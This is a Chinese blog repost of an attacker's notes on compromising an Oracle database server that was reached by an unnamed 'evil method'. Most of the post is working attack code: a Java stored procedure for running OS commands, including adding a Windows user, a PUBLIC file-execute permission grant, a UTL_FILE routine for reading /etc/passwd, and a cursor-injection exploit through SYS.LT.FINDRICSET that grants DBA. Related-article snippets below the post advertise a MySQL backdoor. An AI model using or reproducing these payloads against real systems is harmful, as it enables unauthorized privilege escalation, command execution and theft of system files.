Hacking Oracle 之光标注射

最新推荐文章于 2024-06-18 09:18:55 发布
最新推荐文章于 2024-06-18 09:18:55 发布
阅读量557 收藏
点赞数
文章标签: oracle exception string output function 服务器
转载自 linx2008
最终编辑 linx2008
这是两年前的一篇笔记。内容有删减。

先是通过某个邪恶的方法连接了oracle服务器......(过程略)


很快便连接上oracle服务器,此时发现:
1.连接后不是dba权限
2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限
3.运行SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 后发现oracle服务器不能连接网络。


幸运的是,
运行
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;

成功!这个用户具有create proceduce权限。

此时马上想到创建java扩展执行命令:

create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"/n";myReader.close();return str;} catch (Exception e){return e.toString();}}}


begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );end;

create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name 'LinxUtil.runCMD(java.lang.String) return String'

select  * from all_objects where  object_name like '%LINX%'
grant all on LinxRunCMD to public
select  LinxRunCMD('cmd /c net user linx /add') from dual


但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!
还好,我们还有UTL库可以利用:

create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
fHandler UTL_FILE.FILE_TYPE;
buf      varchar2(4000);
output      varchar2(8000);
BEGIN
fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
loop  
begin  
utl_file.get_line(fHandler,buf);  
DBMS_OUTPUT.PUT_LINE('Cursor: '||buf);
exception    
when   no_data_found   then   exit;  
end;  
output := output||buf||chr(10);
end   loop;  
UTL_FILE.FCLOSE(fHandler);
return output;
END;


UTL_FILE_DIR需要先用:

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';

指定目录。但运行后发现没有权限。只好想办法提权。


***************游标注射***************

老外写了N个pdf介绍这技术,我精简了代码:


DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
BEGIN SYS.LT.FINDRICSET('.''||dbms_sql.execute(    '||MYC||'      )||'''')--','x'); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);   
END;


运行后重新连接就有dba权限了,简单吧......


现在可以读取文件了:


CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
select LinxUTLReadfile('passwd') from dual


后面就简单了,不写了。

 

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql BackDoor
weixin_34362991的博客
12-24 121
作者:linx2008Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙***.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.[安装]将Mysql.php传到PHP服务器...
linux mysql backdoor_Mysql BackDoor
weixin_34205814的博客
01-19 107
作者:linx2008 Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过. [安装] 将Mysql.php传到PHP服务器上,依填上相应的H...
二进制代码审核
cnbird's blog
06-18 839
http://hi.baidu.com/linx2008/blog/item/869f3f6d0133b8f342169426.htmlhttp://www.gipsky.com/modules/article/view.article.php/24503
hacking oracle笔记
cnbird's blog
03-17 1406
###author:hiphop### ###qq:70381908###为什么要关注 Oracle ?因为Oracle 被大量企业所使用,有许多目标可以选择来渗透许多企业都没有更新且有潜在的方险!提权非常简单,容易拿到shell!!读了blackhat paper 让我开始来研究Oracle因为他只讲到一小部份 真正安全问题还有很广的只是国内好像很少挖掘 因为遇到的环境不多 但是阿 Oracle
oracle服务器权限,入侵Oracle服务器进一步获取权限
weixin_39805734的博客
04-04 68
很快便连接上Oracle服务器,此时发现:1.连接后不是dba权限2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限3.运行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后发现oracle服务器不能连接网络。幸运的是,运行create or ...
oracle注射,Hacking Oracle光标注射
weixin_33002763的博客
04-09 49
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
Hacking Oracle From the Web
weixin_34273481的博客
09-07 101
2005/02/03 《Advanced SQL Injection in Oracle databases》 2007/08/28 kj021320《ART OF WEB-SQL-INJECTION第2卷 ORACLE篇》 2008/01/12 linx《犀利的 oracle 注入技术》 2008/03/ 剑心《Oracle web环境注射技术》 2...
信息收集之Google Hacking
Thunderclap的博客
03-06 1295
site:域名 filetype:pdf | filetype:doc | filetype:xls | filetype:docx | filetype:xlsx | filetype:ppt | filetype:pptx | filetype:csv | filetype:odt | filetype:rtf | filetype:sxw。site:域名 ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini。
Hacking_Oracle_From_Web_2.zip_WEB HACKING_oracle
09-20
hacking Oracle database from Web
Google Hacking语法.md
08-11
自己整理的一些关于Google Hacking语法相关知识,希望对你有所帮助
Hacking Vim
11-30
Kim Schulz has an M.Sc. in Software Engineering from Aalborg University in Denmark. He has been an active developer in the Linux and Open Source communities since 1997 and has worked with everything ...
Web Hacking 101 中文版
10-05
Web Hacking 101 中文版 (ePub格式) 原书:Hack, Learn, Earn, with a Free E-Book ---------------------------------------------------- 本 ePub 基于开源文档,目录书签齐全。 版权归原作者,翻译版权归译者。...
Hacking Basic Secuity
11-30
The Basics of Hacking and Penetration Testing, Second Edition, serves as an introduction to the steps required to complete a penetration test or perform an ethical hack from beginning to end....
Oracle中如何定义定时器
codemami的博客
06-12 615
在上述示例中,MY_PROGRAM是程序名,MY_SCHEDULE是调度名,MY_JOB是作业名。提交作业后,可以使用DBMS_JOB.RUN过程来手动运行作业,或者等待作业在指定的时间自动运行。start_date指定了作业的开始时间,repeat_interval指定了作业的重复执行规则。Oracle定时器是一种工具,用于在指定的时间间隔或特定时间自动执行数据库任务或存储过程。program_action字段中填写的是你的PL/SQL代码或存储过程的名称。作业定义了要执行的程序和使用的调度。
SQL调优方案
努力的小雨,一个阳光向上的博客不仅仅给你知识更希望带给你快乐
06-13 488
3、在查询多的情况下要使用索引提高查询效率,但也降低了insert或update的操作,对于一个表所要建立的索引应保持在6个以下。4、对于数字型的字段就不要使用字符型来代替,数据库对于字符的比较是一个一个的比,而数字则是一次性比较,提高了查询效率。5、对查询进行优化,避免全盘扫描,应尽量在where或order by语句涉及到的字段建立索引。7、不带任何条件的count(*)查询,是绝对要杜绝的,不仅会引起全盘扫描而且没有任何业务意义。6、避免null值得判断,否则将导致数据库放弃使用索引进行全盘扫描。
MySQL数据库笔记(二)
最新发布
2301_78671299的博客
06-18 694
操作数据对象。接受参数返回一个结果。只对一行进行变换。每行返回一个结果。可以嵌套。参数可以是一列或一个值。聚合函数作用于一组数据,并对一组数据返回一个值。子查询指一个查询语句嵌套在另一个查询语句内部的查询。多表查询,也称为关联查询,指两个或更多个表一起完成查询操作。前提条件:这些一起查询的表之间是有关系的(一对一、一对多),它们之间一定是有关联字段,这个关联字段可能建立外键,也可能没有建立外键。比如:员工表和部门表,这两个表依靠“部门编号”进行关联。
突破数据存储瓶颈!转转业财系统亿级数据存储优化实践--图文解析
赵志强的专栏
06-16 1057
原文链接:https://juejin.cn/post/7358704806779437097原文作者:转转技术团队业财系统:业务和财务一体化系统与传统财务记账不同,一笔金额不再是写到记账簿上的一成不变的数字,而是在信息系统中随着业务变化不断发生变化的字段。业财系统除了定期生成财务数据,财务报表之外,还会根据不断变化的财务数据生成决策信息。系统遇到的(换数据库,由原来的mysql换成了tidb)(使用es)
Oracle 19C 数据库表被误删除的模拟恢复
Ahern_的博客
06-13 790
Oracle 19C 数据库表被误删除的模拟恢复操作。4、基于时间点通过RMAN恢复被删除的表。5、RMAN成功后查询并验证表是否恢复。2、记录当前状态下数据库的时间。经过验证被误删除的表成功恢复。1、模拟创建表用于恢复测试。3、模拟表被误操作永久删除。
Googlehacking cache
04-17
Google Hacking Cache是一种利用Google搜索引擎的高级搜索技巧来查找和利用网站漏洞的方法。通过使用特定的搜索语法和关键词,可以在Google的缓存中查找到已被索引的网页的副本,这些副本可能包含敏感信息、未经授权...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值